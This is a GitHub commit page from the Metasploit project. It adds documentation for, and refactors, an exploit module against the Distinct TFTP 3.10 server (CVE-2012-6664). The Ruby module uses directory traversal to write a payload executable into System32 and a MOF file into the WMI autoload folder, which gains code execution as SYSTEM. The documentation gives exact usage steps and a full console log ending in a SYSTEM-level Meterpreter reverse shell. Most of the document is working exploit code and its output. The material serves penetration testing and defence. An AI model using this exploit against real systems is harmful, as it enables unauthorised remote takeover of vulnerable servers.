Skip to content

Commit

Permalink
Landing rapid7#13456, distinct_tftp_traversal: increase delay between…
Browse files Browse the repository at this point in the history 
… upload requests
  • Loading branch information
@adfoster-r7
adfoster-r7 committed May 15, 2020
2 parents fa73d09 + a525007 commit 9c249e8
Show file tree
Hide file tree
Showing 2 changed files with 299 additions and 69 deletions.
229 changes: 229 additions & 0 deletions documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md
View file
@@ -0,0 +1,229 @@
## Vulnerable Application

This module exploits a directory traversal vulnerability in the TFTP
Server component of Distinct Intranet Servers version 3.10 which
allows a remote attacker to write arbitrary files to the server file
system, resulting in code execution under the context of 'SYSTEM'.
This module has been tested successfully on TFTP Server version 3.10
on Windows XP SP3 (EN).

Download:

* https://www.exploit-db.com/apps/00064d0e83691e64ec1b1f8f25627010-Intranet-Servers-310-Setup.exe

## Verification Steps

Setup:

1. Install Distinct Intranet Servers
2. Launch TFTP Server
3. Select `Configure` -> `TFTP` from the application menu
4. Set the root directory to `C:\\some\\path`
5. Check `Enable TFTP Server`
6. Pres `OK` to apply settings

Exploitation:

1. Start `msfconsole`
2. `use exploit/windows/tftp/distinct_tftp_traversal`
3. `set RHOSTS <rhost>`
4. `set DEPTH 10`
5. `run`
6. You should receive a session


## Options

### DEPTH

Levels to reach base directory. (Default: `10`)


## Scenarios

### Microsoft Windows XP SP3 (EN)

```
msf5 > use exploit/windows/tftp/distinct_tftp_traversal
msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205
rhosts => 172.16.191.205
msf5 exploit(windows/tftp/distinct_tftp_traversal) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Sending EXE (73802 bytes)
[*] Started TFTP client listener on 0.0.0.0:6867
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\kRzdfnrUu.exe
[*] Sending 73802 bytes (145 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 512 bytes in block 5
[*] Sent 512 bytes in block 6
[*] Sent 512 bytes in block 7
[*] Sent 512 bytes in block 8
[*] Sent 512 bytes in block 9
[*] Sent 512 bytes in block 10
[*] Sent 512 bytes in block 11
[*] Sent 512 bytes in block 12
[*] Sent 512 bytes in block 13
[*] Sent 512 bytes in block 14
[*] Sent 512 bytes in block 15
[*] Sent 512 bytes in block 16
[*] Sent 512 bytes in block 17
[*] Sent 512 bytes in block 18
[*] Sent 512 bytes in block 19
[*] Sent 512 bytes in block 20
[*] Sent 512 bytes in block 21
[*] Sent 512 bytes in block 22
[*] Sent 512 bytes in block 23
[*] Sent 512 bytes in block 24
[*] Sent 512 bytes in block 25
[*] Sent 512 bytes in block 26
[*] Sent 512 bytes in block 27
[*] Sent 512 bytes in block 28
[*] Sent 512 bytes in block 29
[*] Sent 512 bytes in block 30
[*] Sent 512 bytes in block 31
[*] Sent 512 bytes in block 32
[*] Sent 512 bytes in block 33
[*] Sent 512 bytes in block 34
[*] Sent 512 bytes in block 35
[*] Sent 512 bytes in block 36
[*] Sent 512 bytes in block 37
[*] Sent 512 bytes in block 38
[*] Sent 512 bytes in block 39
[*] Sent 512 bytes in block 40
[*] Sent 512 bytes in block 41
[*] Sent 512 bytes in block 42
[*] Sent 512 bytes in block 43
[*] Sent 512 bytes in block 44
[*] Sent 512 bytes in block 45
[*] Sent 512 bytes in block 46
[*] Sent 512 bytes in block 47
[*] Sent 512 bytes in block 48
[*] Sent 512 bytes in block 49
[*] Sent 512 bytes in block 50
[*] Sent 512 bytes in block 51
[*] Sent 512 bytes in block 52
[*] Sent 512 bytes in block 53
[*] Sent 512 bytes in block 54
[*] Sent 512 bytes in block 55
[*] Sent 512 bytes in block 56
[*] Sent 512 bytes in block 57
[*] Sent 512 bytes in block 58
[*] Sent 512 bytes in block 59
[*] Sent 512 bytes in block 60
[*] Sent 512 bytes in block 61
[*] Sent 512 bytes in block 62
[*] Sent 512 bytes in block 63
[*] Sent 512 bytes in block 64
[*] Sent 512 bytes in block 65
[*] Sent 512 bytes in block 66
[*] Sent 512 bytes in block 67
[*] Sent 512 bytes in block 68
[*] Sent 512 bytes in block 69
[*] Sent 512 bytes in block 70
[*] Sent 512 bytes in block 71
[*] Sent 512 bytes in block 72
[*] Sent 512 bytes in block 73
[*] Sent 512 bytes in block 74
[*] Sent 512 bytes in block 75
[*] Sent 512 bytes in block 76
[*] Sent 512 bytes in block 77
[*] Sent 512 bytes in block 78
[*] Sent 512 bytes in block 79
[*] Sent 512 bytes in block 80
[*] Sent 512 bytes in block 81
[*] Sent 512 bytes in block 82
[*] Sent 512 bytes in block 83
[*] Sent 512 bytes in block 84
[*] Sent 512 bytes in block 85
[*] Sent 512 bytes in block 86
[*] Sent 512 bytes in block 87
[*] Sent 512 bytes in block 88
[*] Sent 512 bytes in block 89
[*] Sent 512 bytes in block 90
[*] Sent 512 bytes in block 91
[*] Sent 512 bytes in block 92
[*] Sent 512 bytes in block 93
[*] Sent 512 bytes in block 94
[*] Sent 512 bytes in block 95
[*] Sent 512 bytes in block 96
[*] Sent 512 bytes in block 97
[*] Sent 512 bytes in block 98
[*] Sent 512 bytes in block 99
[*] Sent 512 bytes in block 100
[*] Sent 512 bytes in block 101
[*] Sent 512 bytes in block 102
[*] Sent 512 bytes in block 103
[*] Sent 512 bytes in block 104
[*] Sent 512 bytes in block 105
[*] Sent 512 bytes in block 106
[*] Sent 512 bytes in block 107
[*] Sent 512 bytes in block 108
[*] Sent 512 bytes in block 109
[*] Sent 512 bytes in block 110
[*] Sent 512 bytes in block 111
[*] Sent 512 bytes in block 112
[*] Sent 512 bytes in block 113
[*] Sent 512 bytes in block 114
[*] Sent 512 bytes in block 115
[*] Sent 512 bytes in block 116
[*] Sent 512 bytes in block 117
[*] Sent 512 bytes in block 118
[*] Sent 512 bytes in block 119
[*] Sent 512 bytes in block 120
[*] Sent 512 bytes in block 121
[*] Sent 512 bytes in block 122
[*] Sent 512 bytes in block 123
[*] Sent 512 bytes in block 124
[*] Sent 512 bytes in block 125
[*] Sent 512 bytes in block 126
[*] Sent 512 bytes in block 127
[*] Sent 512 bytes in block 128
[*] Sent 512 bytes in block 129
[*] Sent 512 bytes in block 130
[*] Sent 512 bytes in block 131
[*] Sent 512 bytes in block 132
[*] Sent 512 bytes in block 133
[*] Sent 512 bytes in block 134
[*] Sent 512 bytes in block 135
[*] Sent 512 bytes in block 136
[*] Sent 512 bytes in block 137
[*] Sent 512 bytes in block 138
[*] Sent 512 bytes in block 139
[*] Sent 512 bytes in block 140
[*] Sent 512 bytes in block 141
[*] Sent 512 bytes in block 142
[*] Sent 512 bytes in block 143
[*] Sent 512 bytes in block 144
[*] Sent 74 bytes in block 145
[*] Transferred 73802 bytes in 145 blocks, upload complete!
[*] Sending MOF (2221 bytes)
[*] Started TFTP client listener on 0.0.0.0:59069
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\wbem\mof\OEEXjgTIL.mof
[*] Sending 2221 bytes (5 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 173 bytes in block 5
[*] Transferred 2221 bytes in 5 blocks, upload complete!
[*] Sending stage (176195 bytes) to 172.16.191.205
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.205:1247) at 2020-05-14 00:43:03 -0400
[!] This exploit may require manual cleanup of 'kRzdfnrUu.exe' on the target
[!] This exploit may require manual cleanup of 'wbem\mof\good\OEEXjgTIL.mof' on the target
meterpreter >
[+] Deleted wbem\mof\good\OEEXjgTIL.mof
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

139 changes: 70 additions & 69 deletions modules/exploits/windows/tftp/distinct_tftp_traversal.rb
View file
Expand Up @@ -9,95 +9,96 @@ class MetasploitModule < Msf::Exploit::Remote
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Distinct TFTP 3.10 Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Distinct TFTP server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', #Initial discovery, PoC (Tom Gregory)
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00",
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
'Description' => %q{
This module exploits a directory traversal vulnerability in the TFTP
Server component of Distinct Intranet Servers version 3.10 which
allows a remote attacker to write arbitrary files to the server file
system, resulting in code execution under the context of 'SYSTEM'.
This module has been tested successfully on TFTP Server version 3.10
on Windows XP SP3 (EN).
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Distinct TFTP 3.10 on Windows', {}]
],
'Privileged' => false,
'DisclosureDate' => "Apr 8 2012",
'DefaultTarget' => 0))
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', # Initial discovery, PoC (Tom Gregory)
'sinn3r' # Metasploit
],
'References' =>
[
['OSVDB', '80984'],
['EDB', '18718'],
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
['CVE', '2012-6664']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' =>
[
['Automatic', { 'auto' => true }],
],
'Privileged' => true,
'DisclosureDate' => '2012-04-08',
'DefaultTarget' => 0
)
)

register_options([
OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])
OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
])
end

def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
'LocalHost' => '0.0.0.0',
'LocalPort' => 1025 + rand(0xffff - 1025),
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'LocalFile' => "DATA:#{data}",
'RemoteFile' => filename,
'Mode' => 'octet',
'Context' => { 'Msf' => framework, 'MsfExploit' => self },
'Action' => :upload
)

ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
tftp_client.send_write_request { |msg| print_status(msg) }
until tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end

def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

# Setup the necessary files to do the wbemexec trick
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)

# Configure how deep we want to traverse
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
exe_name = "#{rand_text_alpha(8..15)}.exe"
exe = generate_payload_exe
mof_name = "#{rand_text_alpha(8..15)}.mof"
mof = generate_mof(mof_name, exe_name)
traversal = '../' * datastore['DEPTH'].to_i

# Upload the malicious executable to C:\Windows\System32\
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
print_status("Sending EXE (#{exe.length} bytes)")
upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
register_file_for_cleanup(exe_name)

# Let the TFTP server idle a bit before sending another file
select(nil, nil, nil, 1)
select(nil, nil, nil, 3)

# Upload the mof file
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
print_status("Sending MOF (#{mof.length} bytes)")
upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
end
end

0 comments on commit 9c249e8

Please sign in to comment.